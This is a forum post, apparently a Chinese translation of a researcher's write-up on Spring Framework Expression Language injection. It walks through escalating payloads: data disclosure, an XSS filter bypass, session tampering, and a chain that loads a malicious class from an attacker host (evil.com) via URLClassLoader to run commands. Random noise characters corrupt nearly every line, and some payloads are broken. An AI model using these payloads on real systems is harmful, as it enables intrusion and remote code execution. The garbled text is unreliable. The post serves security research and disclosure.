Remote Code with- y& c2 W" e. k( R- D' I7 r
Expression Language Injection
* K( J$ [% S' i+ d# {. ^Spring Framework脆弱性—DanAmodio
1 p0 K: O2 d) M/ Z5 R) @全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中/ r. L8 y7 ]2 Q7 G
可能会存在风险。
k# w7 a1 m$ f# v' f+ v在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的6 _+ c- U* i: E1 \8 O
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可4 }; V6 H6 a7 ]: Y, D
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,& y6 D- m: j# v5 [3 N, Z
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
1 A: E/ D( O4 n& d版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。2 }1 o/ g' z/ p8 b: q- m3 a
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但' \) Y9 g1 ^3 A; x `1 V; q( ?
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版6 I1 B3 R+ x2 c( V+ E. K
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。2 E6 M+ J! v. T% }- i# ^ f
这些版本不支持禁用double EL resolution.1 G* K" ~$ k+ C- f; I
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含2 m/ Q2 }0 f( B7 U
EL2.2容器上可能进行远程代码执行。
- q8 w7 }( ~9 k2 i+ r- a; a这是一个原始信息泄露的攻击例子:1 {3 i9 ?* T2 K: ~8 H
请求:' \/ ~$ y6 x7 Q% r( D* n
ttp://vulnerable.com/foo?message=${applicationScope} x$ ?: ]' I$ w1 S
到达以下内容页面:
/ j2 }- e8 I1 q% u$ |0 S) F! ~2 f结果将输出一些包含内部服务器信息calsspath 和本地工作目录
0 u+ K3 X# Q, d( v* T. s# h你也可以做一些其他事情,如这样:/ _3 ^( w! O {7 J6 G
${9999+1}% O- @ d' r* c
还可以访问session 对象和beans4 _6 i& ^4 m% Y# B/ i9 m- o% \
${employee.lastName}
8 \6 F7 U7 v9 d v2 y0 @在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
- i3 e7 o6 `8 e) YEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东+ v/ N; t# f& e5 A. E6 I/ q
西,比如XSS.2 U/ t- E& l$ v1 N
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签' l$ o/ S6 |) ?. Z
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤+ f* p8 d- b6 [! @, N% M, a- U, W: @
呢?”
& H- q# d. A0 e! N# E因此,我尝试巳缦拢�2 T9 U" L5 ]' }' T7 F
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP& f: b; V" }2 M, ^6 H
P7 ? w' `! Z" H2 u! k' m- j: m# ]
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返$ F$ L; y& r& t: R" c
回的文本被插入进了spring:message 标签。" [2 A- _& V6 _* x
这里是一个最终绕过过滤的实例:
( o! ~) ~ a# d3 nhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
4 X& q Q, y! p4 I, q它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
. R3 j; g2 s d# G( b0 W什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?9 Q6 W: o( u% f4 R
经过一番研究,我学习到EL2.2 增加了方法调用。- b$ b* H9 L r- H
我写了一个快速测试应用程序代码并且检测一些功能
1 ?* ]1 l, h, R- w+ r${pageContext.request.getSession().setAttribute(“account”,”123456″)}5 r" U; ~: i9 ?2 o7 N A! E
${pageContext.request.getSession().setAttribute(“admin”,true)}
, P2 ?7 \4 S A" f6 u好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
; u; J9 S4 m! |; n. o* [指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)? d z+ _8 T8 ~" W" D
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.16 X* R3 R' V6 H) W2 M4 G
“, 1234)}
8 Z! |. L7 ~5 V4 i$ `5 d2 b2 L0 E Q2 k${“”.getClass().forName(“java.lang.Runtime”)}
" @; X# Z) E' ^( n3 f( w& F哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
/ j. B* `& g; M/ a: r! w4 s2 R可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函% v! R1 Q6 J6 a$ ~1 |$ u" `2 H. b
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有( S0 z$ I' n- D- {$ M u. X
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
4 f) y' s$ }/ X y& M$ _方法签名invoke(Object obj, Object„ args)
+ E5 e% m0 L/ m: [Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
% d# ` n5 i: t l5 g" Z5 F8 w; c7 s1 V# I题,以让它可以工作起来。! s! N. ?' X4 x4 l4 p4 p' Y
漏洞利用:' W4 P# i0 l# }
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我' B" T( z1 o9 G" e$ ?
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
0 H }9 W* O1 N这里有一些我试过的失败的用例,为了试图让它工作的用例:! Y6 e. g) T$ f9 u0 @
写文件到文件系统 f5 J0 b, R4 Y( n. D2 ^6 ]. i: P
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.5 B! x9 `0 _8 K! }0 ^( v9 i/ r
我认为这些可以很好的工作,但是我不能找到合适的类来载入。$ q% D/ T% q+ {# z
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}9 t6 L4 ~! c( I) {5 R6 v5 j
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:! d- o8 p7 R8 p: P9 B0 X0 n$ Q
org.springframework.expression.spel.standard.SpelExpressionParser not found# S( [4 T; H0 C8 ]) R# `1 a7 w
by/ C1 H& q" h) ]0 x! z7 c* v7 T& n
org.glassfish.web.javax.servlet.jsp [194].
7 B3 Y' B" p" z, b* R 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
/ I! c, m: V! c 利用反射来创建一个新的Runtime(and watch the world burn)$ D7 S3 n) M8 [
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName# Y+ n" B0 `4 W9 }
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
: v7 Z' g' l5 M) ^, r${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}- ?# j/ h3 ]- v! i: [
使用java.lang.ProcessBuilder
1 p$ u0 r, Y& R x0 X8 ~. i 用表达式语言来评估表达式语言
5 A/ L! D# _, v U; a, U8 zExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
# l) D8 t' q# v) q+ n$ s! D) b) z${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
" j5 i3 w; k/ A4 s“,”".getClass(),null)}+ ~. r0 n" J/ U) t
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂); \( A% |& E& G" s7 y. _3 \! L
我在使用一个空数组通过Method.invoke()时失败了很多次
/ t n) k9 h5 g; Y“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
t) y* s4 T# \8 W# [' \! h9 Z5 A @, R.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
$ ~8 e- |# S% ^rrayList”).newInstance().toArray())
% L1 g" x" F: o3 S9 D! gjava.lang.IllegalArgumentException: wrong number of arguments A1 P c7 h% L4 Q& r! W: N% h
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
; n- ~6 R/ j0 N/ D, {以创建一个恶意class文件并且指向类装载器.
$ K) L! J7 p+ L' T. X; t. C3 r我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:5 K4 o+ @: u \3 d1 p
public class Malicious { P2 Y/ d7 O! M7 `3 l& e4 @( ]
public Malicious() {
1 _$ V+ O8 b; ]( |) Rtry { X9 j4 J$ \- U$ u3 A& ^
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac+ _, v$ Y) V; r" `! O2 A; r3 m
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win3 i2 ]% L o c; y+ B* e9 C0 R: N
} catch (Exception e) { \' X2 Q6 S" L, f) Y
}
0 Q- j+ [; l9 G' `/ C% {}
6 l) K, R i2 I3 U; Y我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回5 c S# Y0 x! l( z8 P1 B, d
话中,因此它可以被使用.( s# l, G s3 v, f& b- O
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
2 v, {2 W( N% x8 h(“java.util.ArrayList”).newInstance())}
9 n+ y# m7 ^ f+ Z- ]1 `$ V6 `! zURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建7 c8 t( y) J& r" f% o9 c
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
, W! W/ o0 u6 I1 w% a: y/ U! r: D6 LgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个- F% \2 E: |2 X; v8 H2 E' ~
我们可以调用的create(string)方法,然后转换对一个URL对象。
: R) e- H( N$ G/ T7 b${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh1 t( z8 g& O F# E
ere/malicious/classfile/is/located/”).toURL())}
& ^; r9 ~# p5 [% U, P% _: u然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
9 q5 {" D( r" B( Z6 g恶意类文件被装载并创建,触发远程代码.7 n I3 j) D+ Q q, W, c
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
2 d2 R/ E3 e8 X' B& Qxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
# i) ]# r" R) i# NgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance5 Z6 O8 _9 y5 _
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对